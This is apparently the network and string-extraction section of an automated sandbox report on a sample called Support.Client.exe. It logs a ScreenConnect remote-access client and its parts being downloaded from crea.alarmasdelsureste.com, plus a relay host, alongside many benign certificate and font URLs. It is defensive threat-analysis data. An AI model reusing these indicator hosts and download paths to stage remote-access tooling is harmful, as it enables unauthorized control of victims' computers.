                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: crea.alarmasdelsureste.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: crea.alarmasdelsureste.com
                  Source: global trafficDNS traffic detected: DNS query: 0bd0.adrsxpjm0rga0n.de
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD4.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140BC3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crea.alarmasdelsureste.com
                  Source: svchost.exe, 00000005.00000002.2939687826.000001DEBFA00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.2524797376.0000025140209000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9f6ccd2
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/envj
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFC18000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: svchost.exe, 00000005.00000003.1682678220.000001DEBFC4D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: dfsvc.exe, 00000001.00000002.2524053216.000002513E664000.00000004.00000020.00020000.00000000.sdmp, C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2524053216.000002513E664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7Nfjgt
                  Source: dfsvc.exe, 00000001.00000002.2538376669.000002515A604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2538376669.000002515A604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: dfsvc.exe, 00000001.00000002.2525404173.00000251403DA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2940994575.0000000001EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140834000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514089A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.2525404173.000002514044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2525404173.000002514044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2137356260.000000001B8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdels
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2135090486.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsu
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsur
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140639000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140616000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2137809049.000000001B904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/S2
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.C
                  Source: Support.Client.exe, 00000000.00000002.2002795893.000000000096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2136661516.000000001B830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2137251432.000000001B874000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2137657698.000000001B8CE000.00000004.00000020.00020000.00000000.sdmp, OX50X7XC.log.1.drString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.
                  Source: dfsvc.exe, 00000001.00000002.2543292743.000002515BFB4000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2136661516.000000001B830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application%
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application2
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application2j
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application8j
                  Source: OX50X7XC.log.1.drString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=0bd0.adr
                  Source: dfsvc.exe, 00000001.00000002.2524053216.000002513E664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationDv
                  Source: dfsvc.exe, 00000001.00000002.2542470571.000002515BEF3000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationX
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2136661516.000000001B830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationcd
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationestl
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2137356260.000000001B898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationgod&
                  Source: dfsvc.exe, 00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationx
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationxm
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140A2E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, OX50X7XC.log.1.drString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2524797376.000002514022D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.manifestC
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientSer8
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2525404173.00000251405BB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Core.dllcw
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Windows.dllPt
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageSx
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsCl8
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe.configJ
                  Source: dfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe.configW
                  Source: dfsvc.exe, 00000001.00000002.2542470571.000002515BEF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exeR
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exex
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileMa
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.ex
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exe.config
